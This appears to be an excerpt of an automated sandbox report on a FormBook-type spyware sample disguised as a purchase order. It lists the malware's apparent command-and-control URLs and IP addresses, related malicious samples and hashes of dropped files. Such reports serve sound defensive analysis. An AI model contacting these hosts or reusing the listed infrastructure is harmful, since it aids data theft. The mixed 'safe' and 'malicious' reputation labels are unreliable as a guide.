                        http://www.healthsolutions.top/cent/?0z=mDcdcR8&Qd=l1qN2MMhbl/x2ijL+cYxGoEcoDCmCINS+YU1HxWhb8Kqe535lkNGafx30NgxGLIJJEStArUmzXIrZ0bzKO7vv1M79bDO++JJrrxc/WvjehfCDuj8XmxnNRs= | true | Avira URL Cloud: safe | unknown
                        http://www.golbasi-nakliyat.xyz/gxi9/ | true | Avira URL Cloud: safe | unknown
                        http://www.fineg.online/mkan/?Qd=++BThBYRK05wjkBMoiNZpGp8KzaJeIQtL/1q1tE7a+KA1WWTK8ndyCrnLs1rj5YPQ184ZKAvPKam8uu94QVQnk5qhKksqEgqCLgXJ6uhhZrz9ToUPGPp3h4=&0z=mDcdcR8 | true | Avira URL Cloud: safe | unknown
                        http://www.aflaksokna.com/ifo8/ | true | Avira URL Cloud: safe | unknown
                        http://www.dfbio.net/yzen/ | true | Avira URL Cloud: safe | unknown
                        http://www.healthsolutions.top/cent/ | true | Avira URL Cloud: safe | unknown
                        http://www.asian-massage-us.xyz/kc69/?Qd=NmpF3EhDDWuD2jtxofhf+uMKfjRAnSqtmyJn51mvGwf0ZsSxS3FqZkMY4E4Bhni9ZRnQKXdCwf/FxLiQBiKGPfCZkMeDDDW6mIEhSXgEQREY6q1xuM7O6IY=&0z=mDcdcR8 | true | Avira URL Cloud: safe | unknown
                        http://www.asian-massage-us.xyz/kc69/ | true | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                        http://www.myim.cloud/12ts/?Qd=fK0TrVkIcECrXBtwchSXMVbqSAdnX01vsNkWvaJ0XbQUSkAwNJoncWp26b1Q7HgZ6hy5g1l23+w5zEE84XOKM4tZmbpnG+2S3WPWizQLwh5BCvs1Gs1UezE=&0z=mDcdcR8 | true | Avira URL Cloud: safe | unknown
                        http://www.begumnasreenbano.com/ibl4/?Qd=JoaaHegl6i+0bHLuLd264Bxd28Hb6zIn2a9w13HpkUvWqM8iIVBE+LpbDbn5e+5yif/ulpJxYQTtoLoBamVQ2AU3CZID6kvfd7ZL4Wu9CurbADaEbfhMIYo=&0z=mDcdcR8 | true | Avira URL Cloud: safe | unknown
                        http://www.fineg.online/mkan/ | true | Avira URL Cloud: safe | unknown
                        http://www.myim.cloud/12ts/ | true | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                        http://www.clientebradesco.online/xsf1/?0z=mDcdcR8&Qd=/2dxOCr9e8Tu47VrDtpSeX10nPtSg3pDtJEt3c2Foz5fpzeoRIujBVjrDMsKHc70+0K9iVKA7vE9ZFCiM5OaFTseamB50Z39E1GsXK0bz9SU84PyWrGtEeg= | false | Avira URL Cloud: safe | unknown
                        http://www.begumnasreenbano.com/ibl4/ | true | Avira URL Cloud: safe | unknown
                        http://www.golbasi-nakliyat.xyz/gxi9/?Qd=Ur1yZ7cx/WDhKbJaAn0jkNNLDG3pddkDLNR9jSxILeo8Td4MSncFddMj031fez90w2sTSD8IzMd3myhBgMNGmZp5Mlx2w1QvKSGogY0wmO8HURKJraqBGaM=&0z=mDcdcR8 | true | Avira URL Cloud: safe | unknown
                        http://www.d55dg.top/ftud/ | true | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                        http://www.omexai.info/45sz/ | true | Avira URL Cloud: safe | unknown
                        http://www.dfbio.net/yzen/?Qd=O9V9WpJA2Id3CQ8eXizaOlP9WjrM4aluQNnrI8f3VjqE97lt7JSCdbE8JrYB0ARmCvuQ5PpqBCp66EiUa7dY6YydUJ+eQOaY3qqiNVkH5/URE6MIj12/bE0=&0z=mDcdcR8 | true | Avira URL Cloud: safe | unknown
                        http://www.qiluqiyuan.buzz/p6o9/ | true | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                        Name | Source | Malicious | Antivirus Detection | Reputation
                        https://duckduckgo.com/chrome_newtab | chkntfs.exe, 00000003.00000002.4120991810.0000000007DDE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                        https://duckduckgo.com/ac/?q= | chkntfs.exe, 00000003.00000002.4120991810.0000000007DDE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | chkntfs.exe, 00000003.00000002.4120991810.0000000007DDE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | chkntfs.exe, 00000003.00000002.4120991810.0000000007DDE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                        https://www.ecosia.org/newtab/ | chkntfs.exe, 00000003.00000002.4120991810.0000000007DDE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                        http://www70.clientebradesco.online/ | firefox.exe, 00000008.00000002.2144411310.0000000019FE4000.00000004.80000000.00040000.00000000.sdmp | false | 3%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                        https://ac.ecosia.org/autocomplete?q= | chkntfs.exe, 00000003.00000002.4120991810.0000000007DDE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                        https://www.google.com | chkntfs.exe, 00000003.00000002.4119101815.0000000005D2E000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000003.00000002.4119101815.00000000056E6000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000003.00000002.4120867078.0000000007AF0000.00000004.00000800.00020000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000007.00000002.4118671831.0000000003896000.00000004.00000001.00040000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000007.00000002.4118671831.0000000003EDE000.00000004.00000001.00040000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                        http://www.begumnasreenbano.com | ftfqgrfncDSuar.exe, 00000007.00000002.4120389612.00000000057E2000.00000040.80000000.00040000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | chkntfs.exe, 00000003.00000002.4120991810.0000000007DDE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                        http://www.clientebradesco.online/xsf1?gp=1&js=1&uuid=1725353011.0046901200&other_args=eyJ1cmkiOiAiL | chkntfs.exe, 00000003.00000002.4119101815.0000000005554000.00000004.10000000.00040000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000007.00000002.4118671831.0000000003704000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2144411310.0000000019FE4000.00000004.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                        http://www.aflaksokna.com/cgi-sys/suspendedpage.cgi?Qd=2UIJc9LRnkw4J/sjwPFL6L3Afu5wGks/WFWPir8WYxJAH | chkntfs.exe, 00000003.00000002.4119101815.0000000006052000.00000004.10000000.00040000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000007.00000002.4118671831.0000000004202000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | chkntfs.exe, 00000003.00000002.4120991810.0000000007DDE000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                        http://www.dfbio.net:80/yzen/?Qd=O9V9WpJA2Id3CQ8eXizaOlP9WjrM4aluQNnrI8f3VjqE97lt7JSCdbE8JrYB0ARmCvu | chkntfs.exe, 00000003.00000002.4119101815.000000000669A000.00000004.10000000.00040000.00000000.sdmp, ftfqgrfncDSuar.exe, 00000007.00000002.4118671831.000000000484A000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                        IP | Domain | Country | ASN | ASN Name | Malicious
                        5.144.130.52 | aflaksokna.com | Iran (ISLAMIC Republic Of) | 59441 | HOSTIRAN-NETWORKIR | true
                        13.248.169.48 | www.healthsolutions.top | United States | 16509 | AMAZON-02US | true
                        188.114.97.3 | www.begumnasreenbano.com | European Union | 13335 | CLOUDFLARENETUS | true
                        162.0.239.141 | www.fineg.online | Canada | 22612 | NAMECHEAP-NETUS | true
                        218.247.68.184 | www.dfbio.net | China | 139021 | WEST263GO-HKWest263InternationalLimitedHK | true
                        199.59.243.226 | www.asian-massage-us.xyz | United States | 395082 | BODIS-NJUS | true
                        154.23.184.240 | d55dg.top | United States | 174 | COGENT-174US | true
                        3.33.130.190 | omexai.info | United States | 8987 | AMAZONEXPANSIONGB | true
                        85.159.66.93 | natroredirect.natrocdn.com | Turkey | 34619 | CIZGITR | true
                        198.58.118.167 | www.clientebradesco.online | United States | 63949 | LINODE-APLinodeLLCUS | false
                        161.97.168.245 | www.qiluqiyuan.buzz | United States | 51167 | CONTABODE | true
                        Joe Sandbox version: 40.0.0 Tourmaline
                        Analysis ID: 1503298
                        Start date and time: 2024-09-03 10:42:09 +02:00
                        Joe Sandbox product: CloudBasic
                        Overall analysis duration: 0h 9m 46s
                        Hypervisor based Inspection enabled: false
                        Report type: full
                        Cookbook file name: default.jbs
                        Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of new started processes analysed: 8
                        Number of new started drivers analysed: 0
                        Number of existing processes analysed: 0
                        Number of existing drivers analysed: 0
                        Number of injected processes analysed: 2
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode: default
                        Analysis stop reason: Timeout
                        Sample name: PO_987654345678.exe
                        Detection: MAL
                        Classification: mal100.troj.spyw.evad.winEXE@7/5@17/11
                        EGA Information:
                        • Successful, ratio: 75%
                        HCA Information:
                        • Successful, ratio: 90%
                        • Number of executed functions: 54
                        • Number of non-executed functions: 297
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                        • Excluded IPs from analysis (whitelisted): 92.204.80.11
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, whois-unverified.domainbox.akadns.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes were analyzed; the report is missing behavior information
                        • Report creation exceeded maximum time and may have missing disassembly code information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        Time | Type | Description
                        04:43:53 | API Interceptor | 11600811x Sleep call for process: chkntfs.exe modified
                        Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                        5.144.130.52 | INV20240828.exe | Get hash | malicious | FormBook | Browse | www.aflaksokna.com/ifo8/
                        13.248.169.48 | COTIZACION 290824.exe | Get hash | malicious | FormBook | Browse | www.dyme.tech/h7lb/
                        13.248.169.48 | play.exe | Get hash | malicious | FormBook | Browse | www.astrocloud.shop/7mxg/
                        13.248.169.48 | INV20240828.exe | Get hash | malicious | FormBook | Browse | www.healthsolutions.top/cent/
                        13.248.169.48 | COM404 PDF.exe | Get hash | malicious | FormBook | Browse | www.opentelemetry.shop/he2a/?9r9Hc=ivWl&NtxTwXO=KCPTlsMcF8eqeRPoupc8NSnF5ATV37tgrRW1pEzwOBbcxu+G1NpS7ZYtf9ZA4e+ZQi383eqNlg==
                        13.248.169.48 | quotation.exe | Get hash | malicious | DarkTortilla, FormBook | Browse | www.somon.app/jys5/?pbM=rVxTT&lz=Gv2FWEuKupcxnbQ0F3wuClB9GaJm+HhnnRk0N+Y5EGHs9JmWyVRozS4hAZOY3TSoZ8xeM4DSbtugb4BFcxOd14Bplzi5QjmPlStqozPHXjG7lc9y/dalULA=
                        13.248.169.48 | rRFQ.bat.exe | Get hash | malicious | FormBook | Browse | www.study-in-nyc.online/elaa/
                        13.248.169.48 | REQUEST FOR QUOTATION.exe | Get hash | malicious | FormBook, GuLoader | Browse | www.dyme.tech/pjne/
                        13.248.169.48 | COMMERCAIL INVOICE AND AWB TRACKING DETAILS.exe | Get hash | malicious | FormBook | Browse | www.eworld.org/74ki/
                        13.248.169.48 | Quotation-27-08-24.exe | Get hash | malicious | FormBook | Browse | www.healthsolutions.top/p2w8/
                        13.248.169.48 | DHL AWB TRACKING DETAILS.exe | Get hash | malicious | FormBook | Browse | www.dyme.tech/bduc/
                        188.114.97.3 | LYONSOFT, COOP.V. - Env#U00edo orden 240187 fecha 02-09-2024.exe | Get hash | malicious | FormBook | Browse | www.zabbet911.bet/rn94/?Rfg=Yi0IRovNQwWOfnAHy08ht/gCTr40RJf7rc9gkmQ39zkhNPgtJcFQ44BySlkdb+pXqOs/&D8v=8pGtVJo0up
                        188.114.97.3 | http://www.a-r-robot.com/ | Get hash | malicious | Unknown | Browse | www.a-r-robot.com/pdw/favicon.ico
                        188.114.97.3 | firmware.armv5l.elf | Get hash | malicious | Unknown | Browse | 188.114.97.3/
                        188.114.97.3 | firmware.i586.elf | Get hash | malicious | Unknown | Browse | 188.114.97.3/
                        188.114.97.3 | play.exe | Get hash | malicious | FormBook | Browse | www.playdoge.buzz/dkjp/
                        188.114.97.3 | SecuriteInfo.com.Trojan.DownLoader47.19820.5694.3811.exe | Get hash | malicious | Unknown | Browse | rustmacro.ru/autoupdate.exe
                        188.114.97.3 | QUOTATION_AUGQTRA071244#U00faPDF.scr.exe | Get hash | malicious | Unknown | Browse | filetransfer.io/data-package/DGApDW0P/download
                        188.114.97.3 | QUOTATION_AUGQTRA071244#U00faPDF.scr.exe | Get hash | malicious | Unknown | Browse | filetransfer.io/data-package/DGApDW0P/download
                        188.114.97.3 | QUOTATION_AUGQTRA071244#U00faPDF.scr.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | filetransfer.io/data-package/8hthkO24/download
                        188.114.97.3 | gHPYUEh253.exe | Get hash | malicious | Djvu, Neoreklami, Stealc, Vidar, Xmrig | Browse | joxi.net/4Ak49WQH0GE3Nr.mp3
                        Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                        www.qiluqiyuan.buzz | INV20240828.exe | Get hash | malicious | FormBook | Browse | 161.97.168.245
                        www.qiluqiyuan.buzz | AIDHL3290435890.exe | Get hash | malicious | FormBook | Browse | 161.97.168.245
                        www.qiluqiyuan.buzz | PO#4510065525.exe | Get hash | malicious | FormBook | Browse | 161.97.168.245
                        www.healthsolutions.top | INV20240828.exe | Get hash | malicious | FormBook | Browse | 13.248.169.48
                        www.healthsolutions.top | Quotation-27-08-24.exe | Get hash | malicious | FormBook | Browse | 13.248.169.48
                        www.dfbio.net | INV20240828.exe | Get hash | malicious | FormBook | Browse | 218.247.68.184
                        www.dfbio.net | rRFQ.bat.exe | Get hash | malicious | FormBook | Browse | 218.247.68.184
                        natroredirect.natrocdn.com | 1ow4Qkxfz5.exe | Get hash | malicious | DarkTortilla, FormBook | Browse | 85.159.66.93
                        natroredirect.natrocdn.com | play.exe | Get hash | malicious | FormBook | Browse | 85.159.66.93
                        natroredirect.natrocdn.com | 8htbxM8GPX.exe | Get hash | malicious | FormBook | Browse | 85.159.66.93
                        natroredirect.natrocdn.com | INV20240828.exe | Get hash | malicious | FormBook | Browse | 85.159.66.93
                        natroredirect.natrocdn.com | SecuriteInfo.com.Trojan.GenericKD.73942994.9810.18396.xlsx | Get hash | malicious | FormBook | Browse | 85.159.66.93
                        natroredirect.natrocdn.com | REQUEST FOR QUOTATION.exe | Get hash | malicious | FormBook, GuLoader | Browse | 85.159.66.93
                        natroredirect.natrocdn.com | IMG_00991ORDER_FILES.exe | Get hash | malicious | FormBook, GuLoader | Browse | 85.159.66.93
                        natroredirect.natrocdn.com | New_Order_Big_Bag_PDF.exe | Get hash | malicious | FormBook | Browse | 85.159.66.93
                        natroredirect.natrocdn.com | 350.xls | Get hash | malicious | FormBook | Browse | 85.159.66.93
                        natroredirect.natrocdn.com | Quotation-27-08-24.exe | Get hash | malicious | FormBook | Browse | 85.159.66.93
                        www.asian-massage-us.xyz | INV20240828.exe | Get hash | malicious | FormBook | Browse | 199.59.243.226
                        www.fineg.online | INV20240828.exe | Get hash | malicious | FormBook | Browse | 162.0.239.141
                        www.clientebradesco.online | INV20240828.exe | Get hash | malicious | FormBook | Browse | 45.33.23.183
Match | Associated Sample Name / URL | Detection | Threat Name | Context
HOSTIRAN-NETWORKIR | DOCUMENTS.vbs | malicious | AgentTesla | 5.144.130.41
HOSTIRAN-NETWORKIR | INV20240828.exe | malicious | FormBook | 5.144.130.52
HOSTIRAN-NETWORKIR | Payment-Details.scr.exe | malicious | AgentTesla | 5.144.130.41
HOSTIRAN-NETWORKIR | rDHL_PT563857935689275783656385FV-GDS3535353.bat | malicious | FormBook, GuLoader | 185.83.114.124
HOSTIRAN-NETWORKIR | rFV-452747284IN.bat | malicious | FormBook, GuLoader | 185.83.114.124
HOSTIRAN-NETWORKIR | Shipping Docs.rdf.exe | malicious | AgentTesla, PureLog Stealer | 5.144.130.49
HOSTIRAN-NETWORKIR | PAYMENT LIST.exe | malicious | AgentTesla, PureLog Stealer | 5.144.130.49
HOSTIRAN-NETWORKIR | PO# CV-PO23002552.PDF.exe | malicious | AgentTesla, PureLog Stealer | 5.144.130.49
HOSTIRAN-NETWORKIR | PO# CV-PO23002552.exe | malicious | AgentTesla, PureLog Stealer | 5.144.130.35
HOSTIRAN-NETWORKIR | Overdue Account.pdf.exe | malicious | AgentTesla, PureLog Stealer | 5.144.130.35
CLOUDFLARENETUS | https://admsdworft.top/eky/index.html#crfa_norte_rec@emfa.pt | malicious | HTMLPhisher | 188.114.96.3
CLOUDFLARENETUS | https://travefy.com/f/6ws9rqrq4lmqra2uwxzy6aezsp4xkxar2apshpykuftzrrwdwjsujpvewgjnqxkagajsxvdptxmqhrazxxjrapumsdyzhnespwtsgsvcsqaqkdqq | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | NOAH CRYPT.exe | malicious | FormBook | 188.114.96.3
CLOUDFLARENETUS | Xerox Scan_08312024151015.pdf | malicious | Unknown | 172.67.140.30
CLOUDFLARENETUS | Xerox Scan_08312024151015.pdf | malicious | Unknown | 188.114.96.3
CLOUDFLARENETUS | http://www.pro-pharma.co.uk | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | SecuriteInfo.com.Win32.Trojan-Downloader.Generic.XVN7C1.21480.14818.exe | malicious | Unknown | 104.18.17.253
CLOUDFLARENETUS | https://www.therecoveryvillage.com/drug-addiction/signs-drug-addiction/ | malicious | Unknown | 104.22.54.104
CLOUDFLARENETUS | SecuriteInfo.com.Win32.Trojan-Downloader.Generic.XVN7C1.21480.14818.exe | malicious | Unknown | 104.21.90.238
CLOUDFLARENETUS | SOCRETAS GRAECIA VSL's PARTICULARS.pdf.scr.exe | malicious | AgentTesla | 104.26.12.205
AMAZON-02US | https://travefy.com/f/6ws9rqrq4lmqra2uwxzy6aezsp4xkxar2apshpykuftzrrwdwjsujpvewgjnqxkagajsxvdptxmqhrazxxjrapumsdyzhnespwtsgsvcsqaqkdqq | malicious | Unknown | 34.250.67.152
AMAZON-02US | http://www.porschecentreglasgow.co.uk | malicious | Unknown | 52.222.249.7
AMAZON-02US | https://www.therecoveryvillage.com/drug-addiction/signs-drug-addiction/ | malicious | Unknown | 108.138.26.11
AMAZON-02US | TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exe | malicious | FormBook, LummaC Stealer | 18.141.10.107
AMAZON-02US | djvu452.exe | malicious | Neconyd | 52.34.198.229
AMAZON-02US | https://altanks.com.au/ | malicious | Unknown | 216.137.45.10
AMAZON-02US | https://altanks.com.au/ | malicious | Unknown | 13.33.187.70
AMAZON-02US | https://altanks.com.au/ | malicious | Unknown | 13.33.187.103
AMAZON-02US | Invoice INV_1266.pdf | malicious | Unknown | 52.85.49.77
AMAZON-02US | https://xz0816.cn/ | malicious | Unknown | 3.255.41.64
                        No context
                        No context
                        Process:C:\Users\user\Desktop\PO_987654345678.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):289280
                        Entropy (8bit):7.994772609984253
                        Encrypted:true
                        SSDEEP:6144:COx1UV7WGHK6uWBM6NGBX4V4AzoB5vZx/BB26jX+EmVaaGFFcqaJJOeMO:CO/QZ5pV4vtXXI/uFcqaJJ3MO
                        MD5:9E727CACC162F14482B7C2077F0D7109
                        SHA1:E35B92081819C2E5CAC12CC88C9687C3CE9FBF07
                        SHA-256:DEBE93B072D3A70C2AA37FADC6073DDF5C9C80CFD24F6FA8247014B5282A307A
                        SHA-512:BBA1C85B2106AD4685A6B7AE72E77EE03B8A551271BB965A54D2941E827309DEC555D1C7B52CA5F7FCD892357568E424D4476988C3C17AD744CFDB9D133FE128
                        Malicious:false
                        Reputation:low
                        Preview:..u..3RNC...\..d.V4..m3R...NCFU1UFOJEXEV7QILE0ZO3RNCFU1UF.JEXKI._I.L.{.2..b.=X&f?8*?77Zq*-+^5;.0+c4 _u/!j...vZ>-)k=WE.RNCFU1U?NC.e%1.l)+..:(.H..oQ2.U..y6P.S...f/T..*%=.5!.JEXEV7QI..0Z.2SNi".iUFOJEXEV.QKMN1QO3.JCFU1UFOJExQV7QYLE0*K3RN.FU!UFOHEXCV7QILE0\O3RNCFU1%BOJGXEV7QINEp.O3BNCVU1UF_JEHEV7QILU0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXk"R)=LE0^.7RNSFU1.BOJUXEV7QILE0ZO3RNcFUQUFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU
                        Process:C:\Users\user\Desktop\PO_987654345678.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):289280
                        Entropy (8bit):7.994772609984253
                        Encrypted:true
                        SSDEEP:6144:COx1UV7WGHK6uWBM6NGBX4V4AzoB5vZx/BB26jX+EmVaaGFFcqaJJOeMO:CO/QZ5pV4vtXXI/uFcqaJJ3MO
                        MD5:9E727CACC162F14482B7C2077F0D7109
                        SHA1:E35B92081819C2E5CAC12CC88C9687C3CE9FBF07
                        SHA-256:DEBE93B072D3A70C2AA37FADC6073DDF5C9C80CFD24F6FA8247014B5282A307A
                        SHA-512:BBA1C85B2106AD4685A6B7AE72E77EE03B8A551271BB965A54D2941E827309DEC555D1C7B52CA5F7FCD892357568E424D4476988C3C17AD744CFDB9D133FE128
                        Malicious:false
                        Reputation:low
                        Preview:..u..3RNC...\..d.V4..m3R...NCFU1UFOJEXEV7QILE0ZO3RNCFU1UF.JEXKI._I.L.{.2..b.=X&f?8*?77Zq*-+^5;.0+c4 _u/!j...vZ>-)k=WE.RNCFU1U?NC.e%1.l)+..:(.H..oQ2.U..y6P.S...f/T..*%=.5!.JEXEV7QI..0Z.2SNi".iUFOJEXEV.QKMN1QO3.JCFU1UFOJExQV7QYLE0*K3RN.FU!UFOHEXCV7QILE0\O3RNCFU1%BOJGXEV7QINEp.O3BNCVU1UF_JEHEV7QILU0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXk"R)=LE0^.7RNSFU1.BOJUXEV7QILE0ZO3RNcFUQUFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU1UFOJEXEV7QILE0ZO3RNCFU
                        Process:C:\Users\user\Desktop\PO_987654345678.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):14502
                        Entropy (8bit):7.6194755282159985
                        Encrypted:false
                        SSDEEP:384:fKlUKTgVbU+n6BmD89zY14FrJMz8omo7LC1:fKlUKi4i1w2Q6y
                        MD5:E2A2D367E6B998962F5FCEDD000E0260
                        SHA1:89C2C43AE8EE439726FF80499057BCECB3B0EC69
                        SHA-256:D2890512351C2F74A855123B14D3494676E6F7B020342B231E4053BEABBF1BB0
                        SHA-512:F9E3A657871992F189CACF874C5F0E3ABE79B8FBA802662D243716D9F16766EF5A4699AC2DFF67302F0ADA26F858A3E2033EB10A915AED4A7F7A92BA1976A821
                        Malicious:false
                        Reputation:low
                        Preview:EA06..0..M...../...c..f@.[....P.].@.[..+8.2.f`........e..:......7..7..#|Sp.....?. ... .....|. ..`....C.j.}.X..75.}......`.}.@(>...Y..w4.m....0....,.....}|.0....r............._|S.*......0.o..w...F...;...|60).....|3@...h.Q.L@%.7.......7.T.g.*.5..?.......2.F.g.......5.f...y4.^...>p......B...|.._...?v`Q......M....(...=.....c...f.....W.9......3._.@..e...A..k ...a....O>).4..f.}..?...3 ....C......#.X.g.8.... 6.......1.Y.F?.....Gc.....@#...........l`F..E..c........#..]..c...A....<|.....<~.._.]..........y4...@.~{02/.3...._4...v .O.....|.@jO......M..>`.......|.~....,.m.X..&.........>.. >p5....<~.P....a..@..9.Z.,.X.X...4.,...O~p..L.C....A..2.......p&.....K..@..b....@..X.G.3.............. ..?..@|.._<..C....|.P...n.y..@...).j.+.X.->..(..a.&.l......k......>p........X..P!~M..>`./...-..#?......#.^|._.....[....| 7...g.0.h.,aU_.B....Y...}..<...| ..<........|>)..V.....$........B~..A.......|V ./....)_.4..S..J.@H...7..<#.....~3p............> g/..o. ...d).....`5...W..%..D..
                        Process:C:\Users\user\Desktop\PO_987654345678.exe
                        File Type:ASCII text, with very long lines (65536), with no line terminators
                        Category:dropped
                        Size (bytes):143370
                        Entropy (8bit):2.6635439737859765
                        Encrypted:false
                        SSDEEP:384:qrYq11YnBr4syyK6/nbWHHnv+ml+uGYNb3WUgQNm0LYQ:4
                        MD5:F654070822A72E49D2736DB338C9CF67
                        SHA1:0BDD7830B96EFF994443226E42341ADDFA2EFF56
                        SHA-256:172337F9788D3B2A89E4BF6A8EF263930C4F7C87740DAE6DED84E454FBC0B639
                        SHA-512:5077A079CBDA6321DF08574566D8F14B367F98A07ECA703FB219B74463C4144DF0A4726EC51B595B45D6F8113DB3512EFD0A1D21C03318925CE3D5B539C805AA
                        Malicious:false
                        Reputation:low
                        Preview:06504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504065040650406504c650426504c6504d65045650456504e6504b65048650406504c650436504365042650406504b6504e6504c6504f65045650446504b6504865040650406504065040650406504065040650406504c6504f6504565044650476504c65047650406504b6504e6504c6504f6504d650446504965048650486504f6504d650446504b6504865048650406504465047650406504c65045650486504065040650406504065040650406504c6504865045650496504f6504f6504f6504f6504a650466504065045650486504f65045650446504d650486504465042650446504765040650406504
                        Process:C:\Windows\SysWOW64\chkntfs.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
